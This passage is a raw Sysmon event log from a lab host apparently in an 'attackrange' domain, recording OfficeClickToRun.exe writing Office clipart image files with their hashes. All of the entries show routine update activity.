Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01255G.GIFMD5=003C15DF0C06BF6B4E9E3A98B2E2EADC,SHA256=BA692CA576ED8EABF7E408322D8D815A5D7EE55D5397CFC0F0A472AA8DDD3C10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01247U.BMPMD5=5DD8CB143153DC076707BB2886EAC235,SHA256=CD92BBF0B31C75DCCC1E073AB789772824493A88FC8F88CA3C680DC668B5DAFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01239K.JPGMD5=942208795976DE4D6AB1966736ED8DDC,SHA256=982A0AD9F81930ACDECBC178DFF5C2E4B8005C61BA7073681FA8C49D2BE735E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01236U.BMPMD5=661FCA435353562236F6CD5AC7C908A1,SHA256=52AA80C495C346BAACB5C20545685EA3B944444105225DC19FE06CF0E17201B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01235U.BMPMD5=F265CB9151BBADEB3C524487D0756C5A,SHA256=60511DCE35BE0FE7564C55AECDB6DD67D347626CA10BF00314B0DED269226B74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01221K.JPGMD5=0D5A6E78FD46D5C65AAEF5DD6B07A7D3,SHA256=D0D16F5D4246B26DB3054BB7CB61E168E9ADBED07B5E065000C96608DAC66345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01213K.JPGMD5=3412A2FAB163CD31F55DF2B067A7BC82,SHA256=2A513B0BA36C0834D646DC6E9025D1A57BEB89CF3B9742258B095206319A5BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01179J.JPGMD5=94741EE5111CA53449E640E9DA55BF57,SHA256=8603443D1D29A4CE2B6299A20D2A299E086B237B0755D10DA654A3260E815BD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01046J.JPGMD5=A00BDE077937D21F2A5BA19FF8AA5AFF,SHA256=3DA0F6FC4AF3EE0FE8891EA5C4C9817FC82F67D88BED255853D0464E7BEEDE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01035U.BMPMD5=87DEAFE3EB39CF9ACA5C3E1F6DF21A76,SHA256=9C602EE8EAF1C34BE1308754FB3999E44D2E3A59292ABECD02B12D2D4B6870F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH00780U.BMPMD5=E716AA5FB01D1F782AF8E621C77207B3,SHA256=3FBE4601E3EB4F2552986C267708C36B695533293357813591591FB056684799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH00601G.GIFMD5=EE991FB15E947F688BFEA58BEBD1C7CD,SHA256=15B5A54BEA97598D5BB283E112CFDAC265FF837E65DC418789EF983516BFD9A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE06450_.WMFMD5=4673865E6137C326DA3C6B5953045807,SHA256=D912D761FDEDA3772BF6B1B4CF0ABAADC4FA219D5F8E86B4E5E0060CF8515C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE06049_.WMFMD5=802AEE695425FE13EAE5DB1307A0E0F8,SHA256=DAE91F7A7A8E05AD1842C997682661575495EC61EC038F173BFB447AD67660F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE05930_.WMFMD5=D30C8E0BC70207BF0CF0E3F0B685CDDE,SHA256=2771B311457566EA3A5885193C4A2074D03A6A83870797B22E043FD526B44581,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE05870_.WMFMD5=F995CDB544FCDE642BB62950B38798D5,SHA256=0EEA11E4C14A6D87C72F2D5F20A5E6BA8EAD3E420DAE149E29D4DF6BB5007C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE05869_.WMFMD5=F6FF76430D97831E91FE8F9B24785ABF,SHA256=76C67908D70435A40048BE208014E8EC1987483C3FCD38B30972D7158B681A91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE05710_.WMFMD5=22E376938E48F7E9F13357F419F0C0DD,SHA256=9EDCC2A4AE4AE121880DAD0AE893EF2A1AC14892B38348613A2D27C1169C2814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE05665_.WMFMD5=B7D41D615A6FA5E14CD785D541CF4AB8,SHA256=DACE2DC228EEC7E2AB1EAA9F45A329EBD13DB2012FF3353F50828E6388A152A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE04050_.WMFMD5=29A108EFC4DAEF50CFEA33232E0EC6DC,SHA256=F61F9EF53C5549FD652F00B9AE91450B0851A6EAAFCB3812AC9364AE60539E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03795_.WMFMD5=357AADC5C71EFBBEC77EA1D6EA66076B,SHA256=158CC037DD429907BD609105CC373100C0D78CEDE8BA752627F1AEA1279342F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03731_.WMFMD5=D134A0E7A114E6FFC5B13C5611424AE6,SHA256=257A330D42362BFECE61D7D166E14F2CA689D44C2393C816E29D02E852E10EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03668_.WMFMD5=447576871868B7BE9D4A12B4CC8272F8,SHA256=374FAD12A9535194263C22C390AF0F13B4C5E569FE4A9AE586C9A39C9E149AB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03513_.WMFMD5=3B1469377F351759AE776760985A7458,SHA256=7913C7D045BBDB8482133FB481FBFF09CE4BCC9C88113D1C4D371FE2584B3530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03470_.WMFMD5=BF7267F7B321E6CC549BC33CCB2BB3DC,SHA256=147D3C80513743FCC33A3A8E51F7E2980E328F644E7C6243A2807DC75CE61E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03466_.WMFMD5=5A7E2A0156FA165E3FE4F2630B50A21D,SHA256=F302DBAF60DB4F97243A1DDF763764D570364D8EF17AAF01217E4FCA9CCFDC2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03464_.WMFMD5=176CE70B750DC76AFC288737DE27802D,SHA256=0087D462B44764E8A08346B1F35E28087DDBBDE7008A5E74BE7882F655A1582C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03459_.WMFMD5=5EF616B1CD986CD1CE8C65FD720E26A2,SHA256=5D6B47F3CAE26F70EDF6BA90B56417B197258F72BD9653BF42BF49BA76092FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03453_.WMFMD5=6B99928158BA20EBF12852A3A6DC919E,SHA256=5EEAD53BD789554A93BB5778D04FCF5F6571D5B5C3B69ED1AB91E5FCC07C8FF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03451_.WMFMD5=092B2665FBB1C54C5115CAF7B9AE8BA8,SHA256=E8A8B619799EF283F608313C67B7DBB1283CEDC555AC89FDAA2F66DBE08D516F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03339_.WMFMD5=37904E0EA97F15CAED37FB84DBB9D13B,SHA256=938547A9C5315D9DA6430C2A44D7494AD90F90ED8F9F93DC1327E11E4582A5CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03331_.WMFMD5=C47D89B8B08C7EA1D1B0EA97DDAC5419,SHA256=1EF2A2C02F4E58C895944F4910CD883C5BF51C0173D0D31DC516591A0CEE83F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03257_.WMFMD5=571FD93FEAF1B44183F19F21AB887329,SHA256=3A52717AE8F39E7263FC4F136B056278CE49F60A0B00FA8D47A98DBE0E97E98A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03241_.WMFMD5=9A8A6B69C97271090D21784E2E063429,SHA256=8EDF0E6291D44600CA611E7F949A77130354E6AE6140B6A729554BB812C4558A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE03236_.WMFMD5=69E5E0110DE33910AA733C25E9715A58,SHA256=2724D3C21849CAA8B6C0810E063A40F61E32A8F64CC94821AD7B5EA1AF2DCE4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02957_.WMFMD5=89479B526D46BD869C1A345B8837158B,SHA256=43BD11143C1C948D0AB38CC347C9C9EEA282A35FE8E8498D66C7730F53B20D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02950_.WMFMD5=17E9E2CE02038D6F34445E7D76498EC5,SHA256=388C6969E40659700A929FF2F75BFAF84E1B8F4CDEEC900620B9C4F260317D62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02522_.WMFMD5=BC21C70CB237461B1476ADA502B48FE3,SHA256=35AD2A2050D602D71051AFD8B3698B233E8307840DD090EA453A0DA6D6448E10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02369_.WMFMD5=5213652E6C4157E7DE1AD1A5BE1FE258,SHA256=E8FCA612F8553D747F766B81EC17AA8549F03BE2B0721A84496DA9688C910259,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02296_.WMFMD5=F8F3F6E576743CC20EE4F0D1B86ED07C,SHA256=738E445713CF652564F9719BB23A8E430DA658B1981DB0FD402A7F6C6A361CAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02293_.WMFMD5=20714F1617D5549A37B9E8F385B57EB1,SHA256=B8A4968F8D6FAC7969E6900391F2E6FA72ABB026EBB980F94554CE4B3DA45E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02288_.WMFMD5=1795D18435168CA329DD512BC7E93F3A,SHA256=E45A52A00E80D5E604FA72783ED139DA82CB41FE340A0BD3E15CA8D6CC350B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02287_.WMFMD5=88DA19633FE3B434FBB13DD4D21A7588,SHA256=EFE1A2F325ED9B79E2422B084F3E655D892BDC5922DFA42B9546DCF46AD2031A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02285_.WMFMD5=941E8E1425F0E6743B879CF46EAC7CD6,SHA256=7E5A60FFFEA9C44FBD0A8CAEB6D6B6C31230E4C81DA85E0D070EF9EC12DA8996,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02282_.WMFMD5=6F8E60085C9CBBE15BECDE86382EB745,SHA256=EA19D3FA0B32AD107AA3D36EB65387B900F43697D93143CDE6F70BEFB57E5C3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 